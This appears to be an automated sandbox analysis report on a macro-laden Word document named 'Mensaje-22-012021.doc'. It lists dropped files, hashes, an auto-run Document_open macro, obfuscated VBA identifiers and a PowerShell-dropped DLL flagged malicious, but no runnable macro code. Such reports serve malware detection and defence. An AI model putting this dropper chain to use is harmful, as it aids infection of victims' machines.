                                        SHA-256:B5C73D522CBF336789E5EF81A7EC5ADECA0112CDDA1E6F503C7BCABD959F1BA8
                                        SHA-512:B875A2B751670FAB1C066066CA8DF4F044D0C070137B5B9B14CBB6F8A3450C0040844D362907EC4EBDD8077A230CFE187A70F8CF001C08A519FBFDFDA3AA39D8
                                        Malicious:false
                                        Preview: [doc]..Mensaje-22-012021.LNK=0..Mensaje-22-012021.LNK=0..[doc]..Mensaje-22-012021.LNK=0..
                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                        MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                        SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                        SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                        SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2H6MO9GWQ13A7WY0W5E0.temp
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8016
                                        Entropy (8bit):3.5893053421452628
                                        Encrypted:false
                                        SSDEEP:96:chQCsMqaqvsqvJCwoVAz8hQCsMqaqvsEHyqvJCworLAz2YYXHiAf8H7lUVnAIu:cyzoVAz8ynHnorLAz2uAf8HkAIu
                                        MD5:48F72281BAAEF84031FBFA8EEB2920BA
                                        SHA1:558DE5636D881A0CEA20D93578A231B13801AEF1
                                        SHA-256:CF8C8B174BA4A3C67C9DC93E6D1678035AE0C163B20EE5A126D0E62F92E7C963
                                        SHA-512:649CFC47AE559E65271C80B31993D0B2B9D060EBCDC5473216562D56CE409BCB49A105E6A6F720CDFF3748D8E160006411744DB0650CA90A922F943452B4EB5D
                                        Malicious:false
                                        Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                        C:\Users\user\Desktop\~$nsaje-22-012021.doc
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.431160061181642
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                        MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                        SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                        SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                        SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                        C:\Users\user\O3pp1b5\Y84vhdh\A41O.dll
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):362268
                                        Entropy (8bit):4.387595476678939
                                        Encrypted:false
                                        SSDEEP:3072:x82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CK/R2S2:S2L7HN7Kl/jLA90QECkRN2
                                        MD5:F0B8807DD850DB30EA70918CD87BB302
                                        SHA1:BAE31F0C5B9167AA4B82EAFE396725DD2429388F
                                        SHA-256:707504760B76AA8D62C2B99C8884352CF94D11A50D2E1D63E5F0B4B615DBE58B
                                        SHA-512:723C96AB71A52ABBA13B1DE82B520D1B7676C6001E2336EF1723C90794D8318320B9A41D1101FBB77A1C1BD11017BEF2BAC127FE7BAD0138C3AD146EE3462F52
                                        Malicious:true
                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD, Author: Emilio Soria, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 08:23:00 2021, Last Saved Time/Date: Fri Jan 22 08:23:00 2021, Number of Pages: 1, Number of Words: 4188, Number of Characters: 23877, Security: 8
                                        Entropy (8bit):6.627511981709601
                                        TrID:
                                        • Microsoft Word document (32009/1) 79.99%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                        File name:Mensaje-22-012021.doc
                                        File size:168960
                                        MD5:5023f52efbf71865041baf66ae8411cb
                                        SHA1:dc2aabc9b019199d32c000a8e18e63cafa4fbfd3
                                        SHA256:f4f41ebd2b517564f8764fa21faa2b1a824694e29cb31a2f149245e7bd42ab24
                                        SHA512:3c9a1b8c7d09872fcd4ce6e6b49e5326deb07df56ec552a6c85767e669c4ef705566c43af48fcf39ddc3f00e4ce416d7c12642690b41d4bbb2a72924ee86556a
                                        SSDEEP:3072:5wT4OLiSTS0reTrsbRKyLHCaoyss/j8jsIWFiccn52fbbiqUYbdYPeFmfG5/+vGa:5wT4OLiSTS0reTrsbRKyLHCpqIgDFr/b
                                        File Content Preview:........................>......................................................................................................................................................................................................................................

                                        File Icon

                                        Icon Hash:e4eea2aaa4b4b4a4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "Mensaje-22-012021.doc"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Office Word
                                        Encrypted Document:False
                                        Contains Word Document Stream:True
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1252
                                        Title:
                                        Subject:SQL proactive Tools & Tools user-centric Electronics RSS withdrawal Movies, Garden & Clothing Beauty Unbranded Fresh Mouse bluetooth e-enable HDD
                                        Author:Emilio Soria
                                        Keywords:
                                        Comments:
                                        Template:Normal.dotm
                                        Last Saved By:
                                        Revion Number:1
                                        Total Edit Time:0
                                        Create Time:2021-01-22 08:23:00
                                        Last Saved Time:2021-01-22 08:23:00
                                        Number of Pages:1
                                        Number of Words:4188
                                        Number of Characters:23877
                                        Creating Application:Microsoft Office Word
                                        Security:8

                                        Document Summary

                                        Document Code Page:-535
                                        Number of Lines:198
                                        Number of Paragraphs:56
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:917504

                                        Streams with VBA

                                        VBA File Name: Abljqxjkbk2vy_lwk, Stream Size: 704
                                        General
                                        Stream Path:Macros/VBA/Abljqxjkbk2vy_lwk
                                        VBA File Name:Abljqxjkbk2vy_lwk
                                        Stream Size:704
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 21 ef b2 da 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        Attribute
                                        VB_Name
                                        VBA Code
                                        VBA File Name: G8g2gkh6bwry__ui, Stream Size: 25145
                                        General
                                        Stream Path:Macros/VBA/G8g2gkh6bwry__ui
                                        VBA File Name:G8g2gkh6bwry__ui
                                        Stream Size:25145
                                        Data ASCII:. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . ! . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 21 ef 5e 1c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        ClXNA
                                        (AJDjqGF
                                        HTbrA,
                                        cVcnEoADJ
                                        UBound(XjKXDHK)
                                        VReCHAiRJ
                                        cBmPNCJSv
                                        dIbCu
                                        Until
                                        okhxJwD,
                                        kIvjrjw
                                        VDHdFe(eYEjFQDJ)
                                        MiJnFbPG
                                        dSpDAEE
                                        (suzkCEJLA
                                        TFrdII
                                        VDHdFe
                                        (okhxJwD
                                        NIMCpHq.Range
                                        tqPaJVaI
                                        PCPgY
                                        gsTJBDF:
                                        fdZhB
                                        MidB$(uyhJSGFz,
                                        mbpHHN
                                        MidB$(sNgsIAHE,
                                        IuhgF
                                        GLlApHHEJ
                                        eJANFqL
                                        RbMyeP
                                        fxXYAMVdF
                                        cBmPNCJSv,
                                        YuPeG
                                        PcBxCUJMG,
                                        GScOJ
                                        ZBynKFIwD()
                                        LvYEC
                                        ZBynKFIwD
                                        MidB$(ZTyEBE,
                                        MidB$(BVdyh,
                                        bNYyYXL
                                        EOcYgB(CAlyYGB)
                                        AJrTz
                                        THKqLGT
                                        dIbCu:
                                        njcnja
                                        RbMyeP(TyDxBSIdA)
                                        BKEgrCxm
                                        MidB$(nnlZQJ,
                                        RKIpPiC
                                        UBound(cpOKEJtD)
                                        ePLxJDEQ
                                        MidB$(kfjcECA,
                                        qgEMBdBYB:
                                        IUYlYAEA,
                                        AJDjqGF,
                                        icPja
                                        DZIfc,
                                        OVwbHY
                                        qGuvNH
                                        mWxDGCZ(gwagFYDyL)
                                        (raTZFsA
                                        okhxJwD
                                        qWifvgt.Range
                                        OwiiteDFb
                                        FEPdEGVA
                                        tNjjB
                                        BVdyh(YTtAAI)
                                        oXlBGvJfA
                                        uEbsID
                                        cqwHzoLID
                                        (zRFIAwB
                                        (LwirJwf
                                        UBound(ZnyfAN)
                                        XqPtJrDK
                                        nnlZQJ()
                                        UBound(BVdyh)
                                        (ZkJzCh
                                        (tdXEHJ
                                        (VVTbccCG
                                        UBound(SZReI)
                                        PulHIFHnz
                                        HUHCzF:
                                        BVdyh
                                        UlVLK
                                        uyhJSGFz
                                        HNhWtDI
                                        (jUjjFhGI
                                        (RKIpPiC
                                        muFWfC
                                        ZleRMqC.Range
                                        XjKXDHK
                                        eCwdCD.Range
                                        drGfeJB,
                                        inUMImaxJ
                                        yFnWCE
                                        GErrVLlHD
                                        CAlyYGB,
                                        gwagFYDyL
                                        sNgsIAHE()
                                        gozyDA
                                        wjnsc
                                        suzkCEJLA,
                                        (TjPUUD
                                        uuvyPZHIG
                                        REqKI
                                        bMekI
                                        SZReI(PcBxCUJMG)
                                        EOcYgB
                                        ZTyEBE()
                                        nnjasd,
                                        Resume
                                        kfjcECA()
                                        VLtTfYFt
                                        CenkBB
                                        CpsTrGJAF
                                        ZBynKFIwD(aSgPdU)
                                        LHEHF(HTbrA)
                                        mxYGH
                                        MidB$(RbMyeP,
                                        FcbwGH
                                        UBound(sNgsIAHE)
                                        goDHgU
                                        ncCHIhhLE.Range
                                        (cBmPNCJSv
                                        uwchBBD
                                        YexJBz
                                        LHEHF()
                                        (PcBxCUJMG
                                        drGfeJB
                                        JAlLID
                                        uyhJSGFz(iwKTZKXhU)
                                        aSgPdU,
                                        WGVEGF
                                        ctLwz
                                        CwgHH
                                        eCwdCD
                                        AJDjqGF
                                        qgEMBdBYB
                                        (DZIfc
                                        FIGYEGhf()
                                        HUHCzF
                                        tgwzEB
                                        mwapl
                                        OpAzQISCW
                                        XjKXDHK(PBPzFIbWR)
                                        kfjcECA(jUjjFhGI)
                                        DcXNSh.Range
                                        ZnyfAN
                                        XrwiFADBq
                                        LHEHF
                                        tdXEHJ,
                                        TyDxBSIdA,
                                        KVCwR:
                                        SZReI
                                        aIMpJ
                                        (tiGZxsJvH
                                        TjPUUD
                                        XlvjIkDRm
                                        PcBxCUJMG
                                        wegaJFI(zRFIAwB)
                                        zRFIAwB
                                        ZpWVJHXEu:
                                        (lscvJD
                                        uwchBBD,
                                        GDjkmbZO
                                        (GErrVLlHD
                                        YTFWIm
                                        IUYlYAEA
                                        fxXYAMVdF()
                                        QDTPGBDf:
                                        gpisJQHAG
                                        uyhJSGFz()
                                        (YTtAAI
                                        aSgPdU
                                        bvhzG
                                        OwiiteDFb.Range
                                        BVdyh()
                                        (gwagFYDyL
                                        RyCWCBYIH
                                        (RyCWCBYIH
                                        fuDVD,
                                        iShKFOU
                                        BlJoEDG.Range
                                        elPNHo
                                        ZkJzCh,
                                        pjxrYVa
                                        cpOKEJtD
                                        (aSgPdU
                                        VB_Name
                                        nnlZQJ
                                        UBound(ZTyEBE)
                                        (TyDxBSIdA
                                        TwWzZXBCS
                                        mwapl:
                                        EOcYgB()
                                        eYEjFQDJ,
                                        YTFWIm.Range
                                        (VLtTfYFt
                                        NIMCpHq
                                        VDHdFe()
                                        AwKTLGIoI
                                        TyDxBSIdA
                                        rJumAGpCU
                                        POCPCR
                                        MidB$(fxXYAMVdF,
                                        WLHzhZ()
                                        ZleRMqC
                                        Mid(Application.Name,
                                        MKOkAkDEA
                                        iwKTZKXhU
                                        kfjcECA
                                        mdTlBB
                                        rJumAGpCU,
                                        nnlZQJ(tdXEHJ)
                                        sSrGGR:
                                        (eYEjFQDJ
                                        ZkJzCh
                                        UBound(LHEHF)
                                        RyCWCBYIH,
                                        BsOFD
                                        UBound(kfjcECA)
                                        CAlyYGB
                                        (HTbrA
                                        UBound(VDHdFe)
                                        UBound(wegaJFI)
                                        (dQxQHD
                                        uuvyPZHIG.Range
                                        cvaip:
                                        SZReI()
                                        XlvjIkDRm.Range
                                        zBkPfohF,
                                        eYEjFQDJ
                                        tiGZxsJvH
                                        VVTbccCG,
                                        DcXNSh
                                        lscvJD
                                        (kIvjrjw
                                        ZODWBsEBI
                                        Attribute
                                        VReCHAiRJ.Range
                                        LwirJwf,
                                        (uwchBBD
                                        wegaJFI()
                                        tBeDiDD
                                        IcFSF
                                        fdZhB,
                                        lLxOEH
                                        RbMyeP()
                                        tgwzEB:
                                        HTbrA
                                        "sadsaccc"
                                        "sasdsacc"
                                        (fdZhB
                                        RvTnG:
                                        sSrGGR
                                        YTtAAI
                                        LuszFqPBe
                                        QJnPD.Range
                                        gsTJBDF
                                        vezoZEF
                                        GWccvBGM
                                        bDcyAJPCF
                                        LwirJwf
                                        RuvvQGCA
                                        WLHzhZ(ZkJzCh)
                                        MidB$(FIGYEGhf,
                                        ZTyEBE
                                        TjPUUD,
                                        WLHzhZ
                                        cpOKEJtD()
                                        FcFNoAAE
                                        YxtlI
                                        iwKTZKXhU,
                                        vpanjBY
                                        sNgsIAHE(kIvjrjw)
                                        ClXNA.Range
                                        gNcgKABSu,
                                        DZIfc
                                        KiBukZaID.Range
                                        GxrODGqJO
                                        TIbRCHDII
                                        TYdyE()
                                        yrtjM
                                        tiGZxsJvH,
                                        JAlLID:
                                        Word.Paragraph
                                        Amrro:
                                        GScOJ:
                                        UBound(FIGYEGhf)
                                        XjKXDHK()
                                        ncCHIhhLE
                                        tGjntI
                                        ZnyfAN(fdZhB)
                                        MidB$(TYdyE,
                                        (CAlyYGB
                                        UjrtBI
                                        gwagFYDyL,
                                        zdCmAI
                                        Content
                                        (rJumAGpCU
                                        (zBkPfohF
                                        cEmoHG
                                        BKSuHOBvJ
                                        UBound(TYdyE)
                                        HNhWtDI:
                                        tdXEHJ
                                        WtYQEjgU
                                        BlJoEDG
                                        cpOKEJtD(dQxQHD)
                                        MidB$(LHEHF,
                                        mWxDGCZ()
                                        uXlUZy.Range
                                        TYdyE
                                        EWIhJ
                                        qWifvgt
                                        (IUYlYAEA
                                        KVCwR
                                        RKIpPiC,
                                        apjbJ
                                        UMnSoxA
                                        MidB$(ZBynKFIwD,
                                        (GxrODGqJO
                                        MidB$(XjKXDHK,
                                        PdfUXG:
                                        raTZFsA
                                        GxrODGqJO,
                                        dQxQHD
                                        dQxQHD,
                                        dveWsFckI
                                        VVTbccCG
                                        UBound(EOcYgB)
                                        PBPzFIbWR,
                                        ceHSbhbJB:
                                        UBound(WLHzhZ)
                                        TYdyE(raTZFsA)
                                        VLtTfYFt,
                                        ZnyfAN()
                                        KiBukZaID
                                        zBkPfohF
                                        bNYyYXL.Range
                                        MdzVCx:
                                        fuDVD
                                        mWxDGCZ
                                        iNgeDAH
                                        mFbuvJLI.Range
                                        KubaMOGU
                                        MidB$(SZReI,
                                        SImJJG
                                        VDpyCCYs
                                        CeWPLG
                                        QDTPGBDf
                                        Amrro
                                        zRFIAwB,
                                        MidB$(wegaJFI,
                                        eJWWCW
                                        rXzEFGHKJ
                                        TizYJf
                                        Len(skuwd))
                                        YnzSJBHHF
                                        MidB$(EOcYgB,
                                        gNcgKABSu
                                        QJnPD
                                        MidB$(VDHdFe,
                                        CEOrEZgDD
                                        mFbuvJLI
                                        WLznQDX
                                        ZTyEBE(AJDjqGF)
                                        suzkCEJLA
                                        OgHJdA
                                        UBound(fxXYAMVdF)
                                        UBound(RbMyeP)
                                        MEvFND:
                                        (gNcgKABSu
                                        fxXYAMVdF(lscvJD)
                                        CwgHH:
                                        lscvJD,
                                        CuXRxFgAL
                                        cvaip
                                        cVcnEoADJ,
                                        ceHSbhbJB
                                        ZpWVJHXEu
                                        MidB$(ZnyfAN,
                                        (iwKTZKXhU
                                        kIvjrjw,
                                        BVtuJgIH
                                        raTZFsA,
                                        GErrVLlHD,
                                        FIGYEGhf
                                        Mid(skuwd,
                                        igPim
                                        psbMqwGY
                                        jUjjFhGI,
                                        UBound(uyhJSGFz)
                                        MdzVCx
                                        UBound(nnlZQJ)
                                        PBgduIjWs
                                        UBound(ZBynKFIwD)
                                        KaMtAb
                                        MidB$(cpOKEJtD,
                                        gTBbxHBP
                                        NZUhGE
                                        Error
                                        dvdwE
                                        YTtAAI,
                                        PBPzFIbWR
                                        (drGfeJB
                                        yvMEADFZV
                                        CEOrEZgDD.Range
                                        RvTnG
                                        MEvFND
                                        PBgduIjWs,
                                        (PBgduIjWs
                                        tHCfD
                                        jUjjFhGI
                                        upruE
                                        PdfUXG
                                        MidB$(WLHzhZ,
                                        uXlUZy
                                        Function
                                        (fuDVD
                                        nlqbKVFYf
                                        MidB$(mWxDGCZ,
                                        (PBPzFIbWR
                                        ckzLJpOd
                                        (cVcnEoADJ
                                        PulHIFHnz.Range
                                        uVJHDJ
                                        NyNKZ
                                        WSUqgCG
                                        nnjasd
                                        wegaJFI
                                        UBound(mWxDGCZ)
                                        FIGYEGhf(cBmPNCJSv)
                                        WtYQEjgU.Range
                                        sNgsIAHE
                                        skuwd
                                        IlkMCOGt
                                        VBA Code
                                        VBA File Name: M355vvc_qfa, Stream Size: 1106
                                        General
                                        Stream Path:Macros/VBA/M355vvc_qfa
                                        VBA File Name:M355vvc_qfa
                                        Stream Size:1106
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 21 ef 9b b5 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        False
                                        Private
                                        VB_Exposed
                                        Attribute
                                        VB_Creatable
                                        VB_Name
                                        Document_open()
                                        VB_PredeclaredId
                                        VB_GlobalNameSpace
                                        VB_Base
                                        VB_Customizable
                                        VB_TemplateDerived
                                        VBA Code

                                        Streams

                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                        General
                                        Stream Path:\x1CompObj
                                        File Type:data
                                        Stream Size:146
                                        Entropy:4.00187355764
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                        General
                                        Stream Path:\x5DocumentSummaryInformation
                                        File Type:data
                                        Stream Size:4096
                                        Entropy:0.280929556603
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . i m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 560
                                        General
                                        Stream Path:\x5SummaryInformation
                                        File Type:data
                                        Stream Size:560
                                        Entropy:4.19057510655
                                        Base64 Encoded:False
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 00 02 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 64 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                        Stream Path: 1Table, File Type: data, Stream Size: 6861
                                        General
                                        Stream Path:1Table
                                        File Type:data
                                        Stream Size:6861
                                        Entropy:6.02796509914
                                        Base64 Encoded:True
                                        Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                        Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                        General
                                        Stream Path:Macros/PROJECT
                                        File Type:ASCII text, with CRLF line terminators
                                        Stream Size:527
                                        Entropy:5.53582683965
                                        Base64 Encoded:True
